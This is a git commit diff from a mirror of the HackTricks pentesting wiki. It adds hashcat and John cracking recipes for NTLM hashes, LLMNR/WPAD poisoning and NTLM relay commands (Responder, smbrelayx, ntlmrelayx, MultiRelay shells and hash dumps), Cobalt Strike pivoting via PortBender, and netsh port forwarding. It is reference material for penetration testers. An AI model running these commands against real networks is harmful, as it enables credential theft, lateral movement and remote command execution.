mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-21 20:23:18 +00:00
GitBook: [#3375] No subject
This commit is contained in:
parent
268d48c250
commit
8007252a2d
8 changed files with 213 additions and 51 deletions
BIN
.gitbook/assets/image (4) (2).png
Normal file
BIN
.gitbook/assets/image (4) (2).png
Normal file
Binary file not shown.
After Width: | Height: | Size: 947 KiB |
Binary file not shown.
Before Width: | Height: | Size: 947 KiB After Width: | Height: | Size: 99 KiB |
Binary file not shown.
Before Width: | Height: | Size: 99 KiB After Width: | Height: | Size: 176 KiB |
|
@ -621,6 +621,21 @@ hash-identifier
|
|||
> <HASH>
|
||||
```
|
||||
|
||||
### Wordlists
|
||||
|
||||
* **Rockyou**
|
||||
* ****[**Probable-Wordlists**](https://github.com/berzerk0/Probable-Wordlists)****
|
||||
* ****[**Kaonashi**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/wordlists)****
|
||||
* ****[**Seclists - Passwords**](https://github.com/danielmiessler/SecLists/tree/master/Passwords)****
|
||||
|
||||
### **Wordlist Generation Tools**
|
||||
|
||||
* [**kwprocessor**](https://github.com/hashcat/kwprocessor)**:** Advanced keyboard-walk generator with configureable basechars, keymap and routes.
|
||||
|
||||
```bash
|
||||
kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txt
|
||||
```
|
||||
|
||||
### John mutation
|
||||
|
||||
Read _**/etc/john/john.conf**_ and configure it
|
||||
|
@ -632,6 +647,78 @@ john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules
|
|||
|
||||
### Hashcat
|
||||
|
||||
#### Hashcat attacks
|
||||
|
||||
* **Wordlist attack** (`-a 0`) with rules
|
||||
|
||||
**Hashcat** already comes with a **folder containing rules** but you can find [**other interesting rules here**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/rules).
|
||||
|
||||
```
|
||||
hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
|
||||
```
|
||||
|
||||
* **Wordlist combinator** attack
|
||||
|
||||
It's possible to **combine 2 wordlist into 1** with hashcat.\
|
||||
If the list 1 contained the word **"hello"** and the second contained 2 lines with the words **"world"** and **"earth"**. The words `helloworld` and `helloearth` will be generated.
|
||||
|
||||
```bash
|
||||
# This will combine 2 wordlists
|
||||
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt
|
||||
|
||||
# Same attack as before but adding chars in the newly generated words
|
||||
# In the rpevious example this will generate:
|
||||
## hello-world!
|
||||
## hello-earth!
|
||||
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!
|
||||
```
|
||||
|
||||
* **Mask attack** (`-a 3`)
|
||||
|
||||
```bash
|
||||
# Mask attack with simple mask
|
||||
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d
|
||||
|
||||
hashcat --help #will show the charsets and are as follows
|
||||
? | Charset
|
||||
===+=========
|
||||
l | abcdefghijklmnopqrstuvwxyz
|
||||
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
|
||||
d | 0123456789
|
||||
h | 0123456789abcdef
|
||||
H | 0123456789ABCDEF
|
||||
s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
|
||||
a | ?l?u?d?s
|
||||
b | 0x00 - 0xff
|
||||
|
||||
# Mask attack decalring custom charset
|
||||
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
|
||||
## -1 ?d?s defines a custom charset (digits and specials).
|
||||
## ?u?l?l?l?l?l?l?l?1 is the mask, where ?1 is the custom charset.
|
||||
|
||||
# Mask attack with variable password length
|
||||
## Create a file called masks.hcmask with this content:
|
||||
?d?s,?u?l?l?l?l?1
|
||||
?d?s,?u?l?l?l?l?l?1
|
||||
?d?s,?u?l?l?l?l?l?l?1
|
||||
?d?s,?u?l?l?l?l?l?l?l?1
|
||||
?d?s,?u?l?l?l?l?l?l?l?l?1
|
||||
## Use it to crack the password
|
||||
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask
|
||||
```
|
||||
|
||||
* Wordlist + Mask (`-a 6`) / Mask + Wordlist (`-a 7`) attack
|
||||
|
||||
```bash
|
||||
# Mask numbers will be appended to each word in the wordlist
|
||||
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d
|
||||
|
||||
# Mask numbers will be prepended to each word in the wordlist
|
||||
hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt
|
||||
```
|
||||
|
||||
#### Hashcat modes
|
||||
|
||||
```bash
|
||||
hashcat --example-hashes | grep -B1 -A2 "NTLM"
|
||||
```
|
||||
|
|
|
@ -1,7 +1,5 @@
|
|||
# Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
|
||||
|
||||
## Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -37,7 +35,9 @@ Many browsers use Web Proxy Auto-Discovery (WPAD) to load proxy settings from th
|
|||
|
||||
Responder automates the WPAD attack—running a proxy and directing clients to a malicious WPAD server via DHCP, DNS, LLMNR, and NBT-NS.
|
||||
|
||||
## Responder
|
||||
## Protocols Poisoning
|
||||
|
||||
### Responder - LLMNR, NBT-NS and MDNS
|
||||
|
||||
> Responder an LLMNR, NBT-NS and MDNS poisoner. It will answer to _specific_ NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: [http://support.microsoft.com/kb/163409](http://support.microsoft.com/kb/163409)). By default, the tool will only answer to File Server Service request, which is for SMB.
|
||||
>
|
||||
|
@ -121,7 +121,7 @@ You won't be able to intercept NTLM hashes (normally), but you can easily grab s
|
|||
|
||||
The **logs and the challenges** of default _**Responder**_ installation in kali can be found in `/usr/share/responder/logs`
|
||||
|
||||
## DHCP Poisoning
|
||||
### DHCP Poisoning
|
||||
|
||||
Windows uses several custom DHCP options such as NetBIOS, WINS, WPAD settings. When a workstation sends a DHCP request to get its networking settings, these additional settings can be included in the DHCP answer to facilitate straightforward connectivity and name resolution.
|
||||
|
||||
|
@ -135,7 +135,7 @@ However, spoofing DHCP answers has unique benefits. **It's definitely stealthier
|
|||
./Responder.py -I eth0 -Pdv
|
||||
```
|
||||
|
||||
## Capturing credentials
|
||||
### Capturing credentials
|
||||
|
||||
Responder is going to **impersonate all the service using the mentioned protocols**. Once some user try to access a service being resolved using those protocols, **he will try to authenticate against Responde**r and Responder will be able to **capture** the "credentials" (most probably a **NTLMv2 Challenge/Response**):
|
||||
|
||||
|
@ -143,57 +143,81 @@ It is possible to try to downgrade to NetNTLMv1 or to try to disable ESS.
|
|||
|
||||
![](<../../.gitbook/assets/poison (1) (1).jpg>)
|
||||
|
||||
## Inveigh
|
||||
### Inveigh - C#/PowerShell Responder
|
||||
|
||||
> Inveigh is a PowerShell ADIDNS/LLMNR/NBNS/mDNS/DNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system.
|
||||
|
||||
[**Inveigh** ](https://github.com/Kevin-Robertson/Inveigh)is a PowerShell script that has the same main features as Responder.
|
||||
[**Inveigh** ](https://github.com/Kevin-Robertson/Inveigh)was a PowerShell script, now it's a C# binary that has the same main features as Responder.\
|
||||
Another version can be found in [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero).
|
||||
|
||||
![](../../.gitbook/assets/45662029-1b5e6300-bace-11e8-8180-32f8d377d48b.png)
|
||||
|
||||
## Relay Attack
|
||||
## NTML Relay Attack
|
||||
|
||||
**Most of the information for this section was taken from** [**https://intrinium.com/smb-relay-attack-tutorial/**](https://intrinium.com/smb-relay-attack-tutorial/)
|
||||
This attack relays **SMB authentication sessions** on an internal network to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**. Please, note that the relayed authentication must be from a **user which has Local Admin access to the relayed** host and **SMB signing must be disabled**.
|
||||
|
||||
This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**. Please, note that the relayed authentication must be from a **user which has Local Admin access to the relayed** host and **SMB signing must be disabled**.
|
||||
### 445 forward and tunneling
|
||||
|
||||
The 3 main **tools** to perform this attack are: **smb\_relay** (metasploit), **MultyRelay** (responder), and **smbrealyx** (impacket).
|
||||
{% hint style="warning" %}
|
||||
If you can **introduce a machine inside the network** you can use any of the **tools** of the following section to perform a relay attack and you don't need to care about this.
|
||||
{% endhint %}
|
||||
|
||||
Independently of the tool, first, you need to **turn Off SMB and HTTP servers** in **/usr/share/responder/Responder.conf** and then execute responder on the desired **interface**: `responder -I eth0 -v`
|
||||
However, in red teams this isn't the case, in red teams you usually will need to **forward the traffic of the port 445 of a Windows machine to your machine** executing any of the following tools and then r**oute back the traffic of that tool through a proxy** to reach the machine to attack inside the internal.
|
||||
|
||||
You can perform this attack using **metasploit module**: `exploit/windows/smb/smb_relay`
|
||||
The tool [**PortBender**](https://github.com/praetorian-inc/PortBender) **** is a driver to **redirect** traffic destined for port **445 to another port** (e.g. 8445) that **we can bind**. It **requires local admin** access in order for the driver to be loaded. It makes sense to use `cd C:\Windows\System32\drivers` since this is where most Windows drivers go.
|
||||
|
||||
The option `SRVHOST` is used to point the server **were you want to get access**. Then, when **any host try to authenticate against you**, metasploit will **try to authenticate against the other** server.
|
||||
```bash
|
||||
Cobalt Strike -> Script Manager -> Load (Select from the filesystem PortBender.cna)
|
||||
|
||||
You **can't authenticate against the same host that is trying to authenticate against you** (MS08-068). **Metasploit** will **always** send a "_**Denied**_" **response** to the **client** that is trying to connect to you.
|
||||
|
||||
If you want to use **smbrelayx** now you should run:
|
||||
beacon> cd C:\Windows\system32\drivers # Go to drivers dir
|
||||
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
|
||||
beacon> PortBender redirect 445 8445 # Forward traffic to 445 to 8445
|
||||
beacon> rportfwd 8445 127.0.0.1 445 # Send traffic to port 8445 to Team Server
|
||||
beacon> socks 1080 # Socks proxy in port 1080 to attack host in the internal network from the Team Server
|
||||
|
||||
# To kill
|
||||
beacon> jobs
|
||||
beacon> jobkill 0
|
||||
beacon> rportfwd stop 8445
|
||||
beacon> socks stop
|
||||
```
|
||||
smbrelayx.py -h <IP target> -c "ipconfig"
|
||||
|
||||
### Metasploit
|
||||
|
||||
```bash
|
||||
setg Proxies socks4:127.0.0.1:1080 # Use this if you need to route the traffic to reach the attacked ip
|
||||
set SRVHOST <local_ip>
|
||||
set SRVPORT 445
|
||||
set SMBHOST <ip_to_auth_to>
|
||||
run -j
|
||||
```
|
||||
|
||||
### smbrelayx
|
||||
|
||||
```bash
|
||||
python3 smbrelayx.py -t smb://<ip_to_attack> -smb2support --no-http-server --no-wcf-server
|
||||
# By default it will just dump hashes
|
||||
# To execute a command use: -c "ipconfig"
|
||||
# To execute a backdoor use: -e "/path/to/backdoor
|
||||
|
||||
# Attack through socks proxy
|
||||
proxychains python3 ntlmrelayx.py -t smb://<ip_to_attack> -smb2support --no-http-server --no-wcf-server
|
||||
```
|
||||
|
||||
### MultyRelay
|
||||
|
||||
If you want to use **MultiRelay**, go to _**/usr/share/responder/tools**_ and execute MultiRelay (`-t <IP target> -u <User>`):
|
||||
|
||||
```bash
|
||||
python MultiRelay.py -t <IP target> -u ALL #If "ALL" then all users are relayed
|
||||
```
|
||||
<pre class="language-bash"><code class="lang-bash"><strong>python MultiRelay.py -t <IP target> -u ALL # If "ALL" then all users are relayed
|
||||
</strong># By default a shell is returned
|
||||
python MultiRelay.py -t <IP target> -u ALL -c whoami #-c to execute command
|
||||
python MultiRelay.py -t <IP target> -u ALL -d #-d to dump hashes
|
||||
|
||||
# Use proxychains if you need to route the traffic to reach the attacked ip</code></pre>
|
||||
|
||||
![](<../../.gitbook/assets/image (209) (1).png>)
|
||||
|
||||
### Post-Exploitation (MultiRelay)
|
||||
|
||||
**At this point you can shut off Responder; we don’t need it anymore.**\
|
||||
**With the shell access we have obtained, there are many actions that we can perform directly from here:**
|
||||
|
||||
**Mimikatz** commands can also be performed directly **from the shell**. Unfortunately, the target used for this tutorial’s antivirus ate my mimikatz, but the following commands can be executed to run mimikatz, as well as the entire pallette of modules.: **`Mimi sekurlsa::logonpasswords`**
|
||||
|
||||
## InveighZero
|
||||
|
||||
InveighZero is a C# LLMNR/NBNS/mDNS/DNS/DHCPv6 spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system. This version shares many features with the PowerShell version of Inveigh.\
|
||||
More information in the [github of the project](https://github.com/Kevin-Robertson/InveighZero).
|
||||
|
||||
## Force Privileged Accounts to login via NTLM
|
||||
### Force NTLM Logins
|
||||
|
||||
In Windows you **may be able to force some privileged accounts to authenticate to arbitrary machines**. Read the following page to learn how:
|
||||
|
||||
|
@ -251,11 +275,12 @@ To mitigate against the WPAD attack, you can add an entry for "wpad" in your DNS
|
|||
|
||||
## References
|
||||
|
||||
**Images from:**\
|
||||
[https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/)\
|
||||
[https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/](https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/)\
|
||||
[https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)\
|
||||
[https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)
|
||||
* [**https://intrinium.com/smb-relay-attack-tutorial/**](https://intrinium.com/smb-relay-attack-tutorial/)
|
||||
* **Images from:**\
|
||||
[https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/)\
|
||||
[https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/](https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/)\
|
||||
[https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)\
|
||||
[https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)
|
||||
|
||||
<details>
|
||||
|
||||
|
|
|
@ -172,6 +172,50 @@ beacon> socks 1080
|
|||
proxychains nmap -n -Pn -sT -p445,3389,5985 10.10.17.25
|
||||
```
|
||||
|
||||
### rPort2Port
|
||||
|
||||
{% hint style="warning" %}
|
||||
In this case the **port is opened in the beacon host**, not in the Team Server and the traffic is sent to the Team Server and from there to the indicated host:port
|
||||
{% endhint %}
|
||||
|
||||
```bash
|
||||
rportfwd [bind port] [forward host] [forward port]
|
||||
rportfwd stop [bind port]
|
||||
```
|
||||
|
||||
To note:
|
||||
|
||||
* Beacon's reverse port forward **always tunnels the traffic to the Team Server** and the **Team Server sends the traffic to its intended destination**, so shouldn't be used to relay traffic between individual machines.
|
||||
* The **traffic is tunnelled inside Beacon's C2 traffic**, not over separate sockets, and also works over P2P links.
|
||||
* You **don't need to be a local admin** to create reverse port forwards on high ports.
|
||||
|
||||
### rPort2Port local
|
||||
|
||||
{% hint style="warning" %}
|
||||
In this case the **port is opened in the beacon host**, not in the Team Server and the **traffic is sent to the Cobalt Strike client** (not to the Team Server) and from there to the indicated host:port
|
||||
{% endhint %}
|
||||
|
||||
```
|
||||
rportfwd_local [bind port] [forward host] [forward port]
|
||||
rportfwd_local stop [bind port]
|
||||
```
|
||||
|
||||
## Windows netsh
|
||||
|
||||
### Port2Port
|
||||
|
||||
You need to be local admin (for any port)
|
||||
|
||||
```bash
|
||||
netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp
|
||||
# Example:
|
||||
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=4444 connectaddress=10.10.10.10 connectport=4444
|
||||
# Check the port forward was created:
|
||||
netsh interface portproxy show v4tov4
|
||||
# Delete port forward
|
||||
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=4444
|
||||
```
|
||||
|
||||
## reGeorg
|
||||
|
||||
[https://github.com/sensepost/reGeorg](https://github.com/sensepost/reGeorg)
|
||||
|
|
|
@ -70,7 +70,7 @@ If you just have access to an AD environment but you don't have any credentials/
|
|||
* [**A more detailed guide on how to enumerate LDAP can be found here.**](../../network-services-pentesting/pentesting-ldap.md)
|
||||
* **Poison the network**
|
||||
* Gather credentials [**impersonating services with Responder**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
|
||||
* Access host by [abusing the relay attack](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)
|
||||
* Access host by [**abusing the relay attack**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)****
|
||||
* Gather credentials **exposing** [**fake UPnP services with evil-S**](../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md)[**SDP**](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)
|
||||
* [**OSINT**](https://book.hacktricks.xyz/external-recon-methodology):
|
||||
* Extract usernames/names from internal documents, social media, services (mainly web) inside the domain environments and also from the publicly available.
|
||||
|
@ -126,21 +126,23 @@ For this phase you need to have **compromised the credentials or a session of a
|
|||
|
||||
### Enumeration
|
||||
|
||||
#### Extracting all domain users
|
||||
|
||||
It's very easy to obtain all the domain usernames from Windows (`net user /domain` ,`Get-DomainUser` or `wmic useraccount get name,sid`). In Linux, you can use: `GetADUsers.py -all -dc-ip 10.10.10.110 domain.com/username` or `enum4linux -a -u "user" -p "password" <DC IP>`
|
||||
|
||||
Having compromised an account is a **big step to start compromising the whole domain**, because you are going to be able to start the **Active Directory Enumeration:**
|
||||
|
||||
Regarding [**ASREPRoast**](asreproast.md) you can now find every possible vulnerable user, and regarding [**Password Spraying**](password-spraying.md) you can get a **list of all the usernames** and try the password of the compromised account, empty passwords and new promising passwords.
|
||||
|
||||
* You could use some [Windows binaries from the CMD to perform a basic recon](../basic-cmd-for-pentesters.md#domain-info), but using [powershell for recon](../basic-powershell-for-pentesters/) will probably be stealthier, and you could even [**use powerview**](../basic-powershell-for-pentesters/powerview.md) to extract more detailed information.
|
||||
* You could use the [**CMD to perform a basic recon**](../basic-cmd-for-pentesters.md#domain-info)
|
||||
* You can also use [**powershell for recon**](../basic-powershell-for-pentesters/) which will be stealthier
|
||||
* You ca also [**use powerview**](../basic-powershell-for-pentesters/powerview.md) to extract more detailed information
|
||||
* Another amazing tool for recon in an active directory is [**BloodHound**](bloodhound.md). It is **not very stealthy** (depending on the collection methods you use), but **if you don't care** about that, you should totally give it a try. Find where users can RDP, find path to other groups, etc.
|
||||
* Look in the LDAP database, with **ldapsearch** or **AdExplorer.exe** to look for credentials in fields _userPassword_ & _unixUserPassword_, or even for _Description_. cf. [Password in AD User comment on PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#password-in-ad-user-comment) for other methods.
|
||||
* If you are using **Linux**, you could also enumerate the domain using [the-useless-one/pywerview](https://github.com/the-useless-one/pywerview).
|
||||
* A **tool with GUI** that you can use to enumerate the directory is **AdExplorer.exe** from **SysInternal** Suite.
|
||||
* You can also search in the LDAP database with **ldapsearch** to look for credentials in fields _userPassword_ & _unixUserPassword_, or even for _Description_. cf. [Password in AD User comment on PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#password-in-ad-user-comment) for other methods.
|
||||
* If you are using **Linux**, you could also enumerate the domain using [**pywerview**](https://github.com/the-useless-one/pywerview).
|
||||
* You could also try automated tools as:
|
||||
* [tomcarver16/ADSearch](https://github.com/tomcarver16/ADSearch)
|
||||
* [61106960/adPEAS](https://github.com/61106960/adPEAS)
|
||||
* [**tomcarver16/ADSearch**](https://github.com/tomcarver16/ADSearch)****
|
||||
* ****[**61106960/adPEAS**](https://github.com/61106960/adPEAS)****
|
||||
* #### Extracting all domain users
|
||||
|
||||
It's very easy to obtain all the domain usernames from Windows (`net user /domain` ,`Get-DomainUser` or `wmic useraccount get name,sid`). In Linux, you can use: `GetADUsers.py -all -dc-ip 10.10.10.110 domain.com/username` or `enum4linux -a -u "user" -p "password" <DC IP>`
|
||||
|
||||
> Even if this Enumeration section looks small this is the most important part of all. Access the links (mainly the one of cmd, powershell, powerview and BloodHound), learn how to enumerate a domain and practice until you feel comfortable. During an assessment, this will be the key moment to find your way to DA or to decide that nothing can be done.
|
||||
|
||||
|
@ -172,6 +174,10 @@ It's very **unlikely** that you will find **tickets** in the current user **givi
|
|||
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
|
||||
```
|
||||
|
||||
### NTML Relay
|
||||
|
||||
If you have managed to enumerate the active directory you will have **more emails and a better understanding of the network**. You might be able to to force NTML [**relay attacks**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)**.**
|
||||
|
||||
## Privilege escalation on Active Directory WITH privileged credentials/session
|
||||
|
||||
**For the following techniques a regular domain user is not enough, you need some special privileges/credentials to perform these attacks.**
|
||||
|
|
|
@ -22,7 +22,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
The [MMC Application Class (MMC20.Application)](https://technet.microsoft.com/en-us/library/cc181199.aspx) COM object allows you to script components of MMC snap-in operations. While enumerating the different methods and properties within this COM object, I noticed that there is a method named `ExecuteShellCommand` under Document.ActiveView.
|
||||
|
||||
![](<../../.gitbook/assets/image (4).png>)
|
||||
![](<../../.gitbook/assets/image (4) (2).png>)
|
||||
|
||||
You can read more on that method [here](https://msdn.microsoft.com/en-us/library/aa815396\(v=vs.85\).aspx). So far, we have a DCOM application that we can access over the network and can execute commands. The final piece is to leverage this DCOM application and the ExecuteShellCommand method to obtain code execution on a remote host.
|
||||
|
||||
|
@ -38,7 +38,7 @@ It is then possible to invoke the `ExecuteShellCommand` method to start a proces
|
|||
|
||||
The **MMC20.Application** object lacked explicit “[LaunchPermissions](https://technet.microsoft.com/en-us/library/bb633148.aspx)”, resulting in the default permission set allowing Administrators access:
|
||||
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (4).png>)
|
||||
|
||||
You can read more on that thread [here](https://twitter.com/tiraniddo/status/817532039771525120).\
|
||||
Viewing which other objects that have no explicit LaunchPermission set can be achieved using [@tiraniddo](https://twitter.com/tiraniddo)’s [OleView .NET](https://github.com/tyranid/oleviewdotnet), which has excellent Python filters (among other things). In this instance, we can filter down to all objects that have no explicit Launch Permission. When doing so, two objects stood out to me: `ShellBrowserWindow` and `ShellWindows`:
|
||||
|
|
Loading…
Reference in a new issue